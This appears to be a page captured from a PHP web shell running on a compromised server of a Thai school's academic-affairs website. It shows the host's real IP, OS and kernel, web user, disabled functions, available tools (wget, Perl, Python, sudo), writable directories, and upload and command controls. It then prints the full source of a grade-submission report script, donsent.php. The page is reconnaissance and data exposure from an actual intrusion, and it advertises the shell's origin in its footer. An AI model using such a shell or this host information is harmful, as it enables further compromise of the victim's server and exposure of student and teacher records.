403Webshell
Server IP : 61.19.30.66  /  Your IP : 216.73.216.59
Web Server : Apache/2.2.22 (Ubuntu)
System : Linux klw 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64
User : www-data ( 33)
PHP Version : 5.3.10-1ubuntu3.48
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/gpa/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/gpa//donsent.php
<?
require_once "head.php";
require_once "config/connectdb.php";

?>

<?
class Paginator{
	var $items_per_page;
	var $items_total;
	var $current_page;
	var $num_pages;
	var $mid_range;
	var $low;
	var $high;
	var $limit;
	var $return;
	var $default_ipp;
	var $querystring;
	var $url_next;

	function Paginator()
	{
		$this->current_page = 1;
		$this->mid_range = 7;
		$this->items_per_page = $this->default_ipp;
		$this->url_next = $this->url_next;
	}
	function paginate()
	{

		if(!is_numeric($this->items_per_page) OR $this->items_per_page <= 0) $this->items_per_page = $this->default_ipp;
		$this->num_pages = ceil($this->items_total/$this->items_per_page);

		if($this->current_page < 1 Or !is_numeric($this->current_page)) $this->current_page = 1;
		if($this->current_page > $this->num_pages) $this->current_page = $this->num_pages;
		$prev_page = $this->current_page-1;
		$next_page = $this->current_page+1;


		if($this->num_pages > 10)
		{
			$this->return = ($this->current_page != 1 And $this->items_total >= 10) ? "<a class=\"paginate\" href=\"".$this->url_next.$this->$prev_page."\">&laquo; ย้อนกลับ</a> ":"<span class=\"inactive\" href=\"#\">&laquo; ย้่อนกลับ</span> ";

			$this->start_range = $this->current_page - floor($this->mid_range/2);
			$this->end_range = $this->current_page + floor($this->mid_range/2);

			if($this->start_range <= 0)
			{
				$this->end_range += abs($this->start_range)+1;
				$this->start_range = 1;
			}
			if($this->end_range > $this->num_pages)
			{
				$this->start_range -= $this->end_range-$this->num_pages;
				$this->end_range = $this->num_pages;
			}
			$this->range = range($this->start_range,$this->end_range);

			for($i=1;$i<=$this->num_pages;$i++)
			{
				if($this->range[0] > 2 And $i == $this->range[0]) $this->return .= " ... ";
				if($i==1 Or $i==$this->num_pages Or in_array($i,$this->range))
				{
					$this->return .= ($i == $this->current_page And $_GET['Page'] != 'All') ? "<a title=\"Go to page $i of $this->num_pages\" class=\"current\" href=\"#\">$i</a> ":"<a class=\"paginate\" title=\"Go to page $i of $this->num_pages\" href=\"".$this->url_next.$i."\">$i</a> ";
				}
				if($this->range[$this->mid_range-1] < $this->num_pages-1 And $i == $this->range[$this->mid_range-1]) $this->return .= " ... ";
			}
			$this->return .= (($this->current_page != $this->num_pages And $this->items_total >= 10) And ($_GET['Page'] != 'All')) ? "<a class=\"paginate\" href=\"".$this->url_next.$next_page."\">หน้าถัดไป &raquo;</a>\n":"<span class=\"inactive\" href=\"#\">&raquo; Next</span>\n";
		}
		else
		{
			for($i=1;$i<=$this->num_pages;$i++)
			{
				$this->return .= ($i == $this->current_page) ? "<a class=\"current\" href=\"#\">$i</a> ":"<a class=\"paginate\" href=\"".$this->url_next.$i."\">$i</a> ";
			}
		}
		$this->low = ($this->current_page-1) * $this->items_per_page;
		$this->high = ($_GET['ipp'] == 'All') ? $this->items_total:($this->current_page * $this->items_per_page)-1;
		$this->limit = ($_GET['ipp'] == 'All') ? "":" LIMIT $this->low,$this->items_per_page";
	}

	function display_pages()
	{
		return $this->return;
	}
}
?>

<HTML>

<HEAD>

<title>ฝ่ายบริหารงานวิชาการ กันทรลักษ์วิทยา</title>
<meta http-equiv="content-type" content="text/html;charset=tis-620">
</head>
<style type="text/css"> 
<!--
	.paginate {
	font-family: Arial, Helvetica, sans-serif;
	font-size: .7em;
	}
	a.paginate {
	border: 1px solid #000080;
	padding: 2px 6px 2px 6px;
	text-decoration: none;
	color: #000080;
	}
	h2 {
		font-size: 12pt;
		color: #003366;
		}
		
		 h2 {
		line-height: 1.2em;
		letter-spacing:-1px;
		margin: 0;
		padding: 0;
		text-align: left;
		}
	a.paginate:hover {
	background-color: #000080;
	color: #FFF;
	text-decoration: underline;
	}
	a.current {
	border: 1px solid #000080;
	font: bold .7em Arial,Helvetica,sans-serif;
	padding: 2px 6px 2px 6px;
	cursor: default;
	background:#000080;
	color: #FFF;
	text-decoration: none;
	}
	span.inactive {
	border: 1px solid #999;
	font-family: Arial, Helvetica, sans-serif;
	font-size: .7em;
	padding: 2px 6px 2px 6px;
	color: #999;
	cursor: default;
	}
-->
</style>

<body>
<?
$sql2="SELECT namesc,tumbolsc,amps,dissc,years,termx FROM config";
mysql_query("SET character_set_results=tis620");//ตั้งค่าการดึงข้อมูลออกมาให้เป็น tis620
mysql_query("SET character_set_client=tis620");//ตั้งค่าการส่งข้อมุลลงฐานข้อมูลออกมาให้ เป็น tis620
mysql_query("SET character_set_connection=tis620");//ตั้งค่าการติดต่อฐานข้อมูลให้เป็น ti
$result2 = mysql_query($sql2);

while (list($namesc,$tumbolsc,$amps,$dissc,$years,$termx) = mysql_fetch_row($result2)) {
$xsc_Name = $namesc;
$xsc_tumbolsc = $tumbolsc;
$xsc_disc = $dissc;
$xsc_amps = $amps;
$xsc_years = $years;
$xsc_termx = $termx;
}

?>



<?

$strSQL = "SELECT * FROM registeacher where yearsxx='$xsc_years' and termxx='$xsc_termx' group by codeteach,registeach ";


//$strSQL = "SELECT DISTINCT code,teach,Titles FROM transcripts 
//LEFT JOIN klw ON  klw.Username=transcripts.IDstudent 
//LEFT JOIN mainsubject ON mainsubject.Codesub=transcripts.code  
//LEFT JOIN teacher ON teacher.teachcode=transcripts.teach  
//where room >0 AND total=0 AND xContent LIKE '%1%' ";


$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$Num_Rows = mysql_num_rows($objQuery);

//SELECT * FROM tableA
//LEFT JOIN tableB ON tableA.b_id = tableB.id
//LEFT JOIN tableC ON tableB.c_id = tableC.id


$Per_Page = 800;   // Per Page

$Page = $_GET["Page"];
if(!$_GET["Page"])
{
	$Page=1;
}

$Prev_Page = $Page-1;
$Next_Page = $Page+1;

$Page_Start = (($Per_Page*$Page)-$Per_Page);
if($Num_Rows<=$Per_Page)
{
	$Num_Pages =1;
}
else if(($Num_Rows % $Per_Page)==0)
{
	$Num_Pages =($Num_Rows/$Per_Page) ;
}
else
{
	$Num_Pages =($Num_Rows/$Per_Page)+1;
	$Num_Pages = (int)$Num_Pages;
}

$strSQL .=" order  by roomteach asc,codeteach asc LIMIT $Page_Start , $Per_Page";
$objQuery  = mysql_query($strSQL);

?>
<table width="100%" border="0" bgcolor="#000000" >
  <tr><font size="1"><center><img src="images/newss.gif" width="100" height="20"></center></font>
    <th bgcolor="green" width="20"> <div align="center"><font size="2">รหัสวิชา</font> </div></th>
	<th bgcolor="green" width="20"> <div align="center"><font size="2">ก่อน</font> </div></th>
	<th bgcolor="green" width="20"> <div align="center"><font size="2">กลาง</font> </div></th>
	<th bgcolor="green" width="20"> <div align="center"><font size="2">หลัง</font> </div></th>
	<th bgcolor="green" width="20"> <div align="center"><font size="2">ปลาย</font> </div></th>
	<th bgcolor="green" width="20"> <div align="center"><font size="2">รวม</font> </div></th>
	<th bgcolor="green" width="100"> <div align="center"><font size="2">ผู้เรียน</font></div></th>
	<th bgcolor="green" width="100"> <div align="center"><font size="2">ส่ง/ไม่ส่ง</font></div></th>
	<th bgcolor="green" width="100"> <div align="center"><font size="2">ห้อง</font></div></th>
	<th bgcolor="green" width="100"> <div align="center"><font size="2">ครูผู้สอน</font></div></th>
	
  
  </tr>
<?
while($objResult = mysql_fetch_array($objQuery))
{
	$code=$objResult[codeteach];
	$teach=$objResult[registeach];
	$roomteach=$objResult[roomteach];

	
?>

<?

				$crsql="SELECT ( ku1+pu1+au1+ku2+pu2+au2+ku3+pu3+au3 ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$bescore=$dcrd[0];

				$crsql="SELECT ( midterm ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$midterm=$dcrd[0];


				$crsql="SELECT ( ku4+pu4+au4+ku5+pu5+au5+ku6+pu6+au6 ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$afscore=$dcrd[0];

				$crsql="SELECT ( final ) FROM `registeacher`
				WHERE codeteach = '$code' and registeach = '$teach' and yearsxx='$xsc_years'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$final=$dcrd[0];

				$all=$bescore+$midterm+$afscore+$final;


?>

  <tr bgcolor="#FFFFFF">
	<td>
	<a href="reportscore.php?id=<? echo "$code"; ?>" style="text-decoration: none;"><font size='2'><?=$objResult["codeteach"];?></font></a></td>

	<td><? echo "$bescore"; ?></td>
	<td><? echo "$midterm"; ?></td>
	<td><? echo "$afscore"; ?></td>
	<td><? echo "$final"; ?></td>
	<td><? echo "$all"; ?></td>
	<td><font size="2">
	
	<?
				$crsql="SELECT count( IDstudent ) FROM `transcripts`
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$numstudy=$dcrd[0];
	
	
	?>
	
	<? echo "$numstudy"; ?>
	
	
	
	
	</font></td>
	<td><font size="2">
	<?
				$crsql="SELECT count( IDstudent ) FROM `transcripts`
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and grad>0";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$nummid=$dcrd[0];



				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=1";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room1=$dcrd[0];



				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=2";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room2=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=3";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room3=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=4";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room4=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=5";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room5=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=6";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room6=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=7";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room7=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=8";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room8=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=9";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room9=$dcrd[0];



				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=10";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room10=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=11";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room11=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=12";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room12=$dcrd[0];



				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=13";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room13=$dcrd[0];



				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=14";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room14=$dcrd[0];


				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=15";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room15=$dcrd[0];



				$crsql="SELECT room FROM klw join transcripts on klw.Username=transcripts.IDstudent
				WHERE code = '$code' and teach = '$teach' and xyy ='$xsc_years' and xterm='$xsc_termx' and room=16";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$room16=$dcrd[0];
	
	
	
	?>
	
	<? echo "$roomteach"; ?>
	
	</font></td>
	<?
				$crsql="SELECT (Name) FROM `teacher`
					WHERE teachcode = '$teach'";
				$slr=mysql_query($crsql) or die(mysql_error()."<br>".$crsql);
				$dcrd = mysql_fetch_array($slr);
				$teac=$dcrd[0];
	
	
	?>
	<td>
	
	
	
	
	&nbsp;ห้อง&nbsp;&nbsp;<? echo "$room1"; ?>
	&nbsp;&nbsp;<? echo "$room2"; ?>
	&nbsp;&nbsp;<? echo "$room3"; ?>
	&nbsp;&nbsp;<? echo "$room4"; ?>
	&nbsp;&nbsp;<? echo "$room5"; ?>
	&nbsp;&nbsp;<? echo "$room6"; ?>
	&nbsp;&nbsp;<? echo "$room7"; ?>
	&nbsp;&nbsp;<? echo "$room8"; ?>
	&nbsp;&nbsp;<? echo "$room9"; ?>
	&nbsp;&nbsp;<? echo "$room10"; ?>
	&nbsp;&nbsp;<? echo "$room11"; ?>
	&nbsp;&nbsp;<? echo "$room12"; ?>
	&nbsp;&nbsp;<? echo "$room13"; ?>
	&nbsp;&nbsp;<? echo "$room14"; ?>
	&nbsp;&nbsp;<? echo "$room15"; ?>
	&nbsp;&nbsp;<? echo "$room16"; ?>
	</font></td>
	<td>ครู.<? echo "$teac"; ?>.<? echo "$teach"; ?>
	
	
	
	
	
	</font></td>
	

	
    
  </tr>
<?
}
?>
</table>

<br>
<font size="1">รายวิชาประกาศผล<?= $Num_Rows;?> วิชา</font>
<?

$pages = new Paginator;
$pages->items_total = $Num_Rows;
$pages->mid_range = 10;
$pages->current_page = $Page;
$pages->default_ipp = $Per_Page;
$pages->url_next = $_SERVER["PHP_SELF"]."?QueryString=value&Page=";

$pages->paginate();

echo $pages->display_pages()
?>		
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit